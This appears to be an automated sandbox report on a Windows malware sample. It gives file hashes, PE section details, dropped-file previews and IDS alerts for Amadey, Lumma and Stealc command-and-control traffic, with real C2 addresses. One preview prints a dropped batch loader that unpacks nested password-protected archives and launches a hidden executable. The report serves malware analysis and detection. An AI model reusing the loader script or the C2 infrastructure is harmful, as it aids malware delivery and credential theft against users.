Preview:	PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..\|...$..}.`..8......lV1..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T......A..\|...{A.p{.b*.\|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.\|.g....&.d..Y.\|..5O...s.\|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

C:\Users\user\AppData\Local\Temp\main\file.bin

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3473725
Entropy (8bit):	7.999948676888215
Encrypted:	true
SSDEEP:	49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
MD5:	045B0A3D5BE6F10DDF19AE6D92DFDD70
SHA1:	0387715B6681D7097D372CD0005B664F76C933C7
SHA-256:	94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
SHA-512:	58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
Malicious:	false
Reputation:	unknown
Preview:	PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW\|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

C:\Users\user\AppData\Local\Temp\main\main.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	440
Entropy (8bit):	5.0791308599041844
Encrypted:	false
SSDEEP:	12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
MD5:	3626532127E3066DF98E34C3D56A1869
SHA1:	5FA7102F02615AFDE4EFD4ED091744E842C63F78
SHA-256:	2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
SHA-512:	DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
Malicious:	false
Reputation:	unknown
Preview:	..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
SSDEEP:	48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
MD5:	D910AD167F0217587501FDCDB33CC544
SHA1:	2F57441CEFDC781011B53C1C5D29AC54835AFC1D
SHA-256:	E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
SHA-512:	F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
Malicious:	false
Reputation:	unknown
Preview:	... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s\|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10547
Entropy (8bit):	5.49569103080614
Encrypted:	false
SSDEEP:	192:/nTFTRR4YbBp6XLZNMGaXU6qU4rzy+/3/OYiNBw8d7Sl:LCeSFNMr4yrdwc0
MD5:	660E5DCA43C1FBC7C415A65F07193442
SHA1:	21582186D89C22B7364D8DA55B7FADF4D7CC2D32
SHA-256:	E7F3CDF6E45BD06EABF183FB8275C678410CCCADEF6F5B507DBA8E5A9C475855
SHA-512:	1D69065F4720B2158C6161EDC7401F6CC964C92FE7CC3D3C71E33635583A2B45F1BD0B96325C3C530654A203150AC8CE9789E922233B90A6D6AEE30B9761F9B5
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1717), with CRLF line terminators
Category:	dropped
Size (bytes):	10547
Entropy (8bit):	5.49569103080614
Encrypted:	false
SSDEEP:	192:/nTFTRR4YbBp6XLZNMGaXU6qU4rzy+/3/OYiNBw8d7Sl:LCeSFNMr4yrdwc0
MD5:	660E5DCA43C1FBC7C415A65F07193442
SHA1:	21582186D89C22B7364D8DA55B7FADF4D7CC2D32
SHA-256:	E7F3CDF6E45BD06EABF183FB8275C678410CCCADEF6F5B507DBA8E5A9C475855
SHA-512:	1D69065F4720B2158C6161EDC7401F6CC964C92FE7CC3D3C71E33635583A2B45F1BD0B96325C3C530654A203150AC8CE9789E922233B90A6D6AEE30B9761F9B5
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Reputation:	unknown
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Reputation:	unknown
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.430480775258797
Encrypted:	false
SSDEEP:	6:lHSftXUhXUEZ+lX1CGdKUe6tE9+AQy0lHtYt0:l0Z4Q1CGAFD9+nVHet0
MD5:	6A74A7DD1B1476B8B47904BF14DA10FA
SHA1:	BF8ECE4BA9C96195F0CD8DC8ED653143D1EEA06C
SHA-256:	A5318AE5ACA24E3C38182F74B4506E05CF94C7605B37455782EFB45E83045E21
SHA-512:	CAD904C026C98E7E3145BB5BC58397585F068113368B467E68077D069BED0737EC8DDA342CB662C15AECEF947336D44B6831E71357E208D393803D32CD34AE37
Malicious:	false
Reputation:	unknown
Preview:	....{q..A*rG..-..vb.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	5.020540290983527
Encrypted:	false
SSDEEP:	6:AMMyS3pt+uoQcAxXF2SaioB6bGiSTgnMpF1AivnM7tHgNewrFfpap1tN6k2v:pMpDh5RwXY0TgnMpFyYnM7OrJA1tNzI
MD5:	9438B506521D06922A7223C3F5EF861F
SHA1:	12A1DFE3BD707F77D1C77AE9C10B56B7872DF4E9
SHA-256:	9C0C8189E8016A46F8F11B9887AF755BB5E9F0395FC773A8EEED33ED28D2380E
SHA-512:	5E1E4D53657AE397900EB6B074746C9BC2312289F2CEA370B3E4D3BA7C5188788DADEB057F4B17153C433FC74A59462B4B39949EF2C7EF57F8C2B162A759AF2B
Malicious:	false
Reputation:	unknown
Preview:	..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1800210 bytes (1759 KiB)....Extracting archive: extracted\file_5.zip..--..Path = extracted\file_5.zip..Type = zip..Physical Size = 1800210.... 0%. .Everything is Ok....Size: 1800056..Compressed: 1800210..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.5652640274268075
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'032'576 bytes
MD5:	7944ebe231d464c760a818b34a636cce
SHA1:	52bdb9427bd7e9d2e2a75bcf5fc76e0e7819a73b
SHA256:	c478f40cfe686bdc076d898a735f2857316a64d8e2d9dc405dde3e0ca8194b7f
SHA512:	6435a4f51a6fce88eaf551ca452408fea62d437eb2297a0f6cc2aec94f51813e0c9370744b212217ab4e76016adf892c2d42fb0e6a9d6c8fb3f64c74af9351d7
SSDEEP:	49152:/zsb0bm8mmlxTfGeiWPfaIUekCLjWP2vhhrEFxmKtQCh:/zznmkfGeZPfaIUAL6KhELm
TLSH:	0FE53BA1A50571CFE59A2778942BCDC1695D83F84B2109C3E8BDB5BA7F73CC211B9C28
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x71f000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F12C14BFEBAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31d8f8	0x10	zopdawvw
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31d8a8	0x18	zopdawvw
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	7b3ee8fce624ef5e7f246c8fee5038d1	False	0.9983289339237057	data	7.986926431712589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x5d4	0x600	1e55db351164df1643ae87d7efa3ee0f	False	0.4303385416666667	data	5.417125179370491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zopdawvw	0x6b000	0x2b3000	0x2b2a00	14d0115c93fada47d1ef08005661d084	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hctdavsk	0x31e000	0x1000	0x400	2f2d3489421b297fbd96a305fb72dea2	False	0.7626953125	data	6.059618851157774	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x31f000	0x3000	0x2200	8878005735e81a97480baad61704d019	False	0.3874080882352941	DOS executable (COM)	4.173608982550532	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x3e4	XML 1.0 document, ASCII text			0.48092369477911645
RT_MANIFEST	0x69454	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-19T10:10:06.054314+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	49846	185.215.113.43	80	TCP
2024-12-19T10:10:10.760302+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49860	185.215.113.16	80	TCP
2024-12-19T10:10:15.071739+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.6	60512	1.1.1.1	53	UDP
2024-12-19T10:10:15.717440+0100	2058364	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)	1	192.168.2.6	56657	1.1.1.1	53	UDP
2024-12-19T10:10:16.223487+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.6	49856	TCP
2024-12-19T10:10:17.268735+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	49878	172.67.179.109	443	TCP
2024-12-19T10:10:17.268735+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49878	172.67.179.109	443	TCP
2024-12-19T10:10:17.559293+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	49879	185.215.113.43	80	TCP
2024-12-19T10:10:19.031784+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49881	185.215.113.16	80	TCP
2024-12-19T10:10:27.363784+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.6	49206	1.1.1.1	53	UDP
2024-12-19T10:10:28.371820+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	49904	185.215.113.43	80	TCP
2024-12-19T10:10:28.725832+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	49908	172.67.179.109	443	TCP
2024-12-19T10:10:28.725832+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49908	172.67.179.109	443	TCP
2024-12-19T10:10:30.109727+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49910	185.215.113.16	80	TCP
2024-12-19T10:10:30.112445+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49909	185.215.113.206	80	TCP
2024-12-19T10:10:30.113211+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49878	172.67.179.109	443	TCP
2024-12-19T10:10:30.113211+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49878	172.67.179.109	443	TCP
2024-12-19T10:10:30.558472+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.6	49909	185.215.113.206	80	TCP
2024-12-19T10:10:30.680060+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.6	49909	TCP
2024-12-19T10:10:31.004096+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.6	49909	185.215.113.206	80	TCP
2024-12-19T10:10:31.039680+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	49916	172.67.179.109	443	TCP
2024-12-19T10:10:31.039680+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49916	172.67.179.109	443	TCP
2024-12-19T10:10:31.136376+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.6	49909	TCP
2024-12-19T10:10:33.298990+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.6	49909	185.215.113.206	80	TCP
2024-12-19T10:10:34.010895+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49909	185.215.113.206	80	TCP
2024-12-19T10:10:35.434733+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	49927	185.215.113.43	80	TCP
2024-12-19T10:10:36.897957+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49928	185.215.113.16	80	TCP
2024-12-19T10:10:38.449139+0100	2058378	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)	1	192.168.2.6	57553	1.1.1.1	53	UDP
2024-12-19T10:10:39.816734+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	49946	172.67.179.109	443	TCP
2024-12-19T10:10:39.816734+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49946	172.67.179.109	443	TCP
2024-12-19T10:10:42.656274+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49908	172.67.179.109	443	TCP
2024-12-19T10:10:42.656274+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49908	172.67.179.109	443	TCP
2024-12-19T10:10:43.385002+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	49967	172.67.179.109	443	TCP
2024-12-19T10:10:43.385002+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49967	172.67.179.109	443	TCP
2024-12-19T10:10:43.661614+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	49964	185.215.113.43	80	TCP
2024-12-19T10:10:45.184092+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49974	31.41.244.11	80	TCP
2024-12-19T10:10:55.232414+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49946	172.67.179.109	443	TCP
2024-12-19T10:10:55.232414+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49946	172.67.179.109	443	TCP
2024-12-19T10:10:56.122031+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50019	185.215.113.43	80	TCP
2024-12-19T10:10:56.497408+0100	2058365	ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)	1	192.168.2.6	50020	172.67.179.109	443	TCP
2024-12-19T10:10:56.497408+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50020	172.67.179.109	443	TCP
2024-12-19T10:10:57.592219+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50024	31.41.244.11	80	TCP
2024-12-19T10:11:03.537965+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:05.600674+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	50035	185.215.113.206	80	TCP
2024-12-19T10:11:06.285123+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50047	104.21.12.88	443	TCP
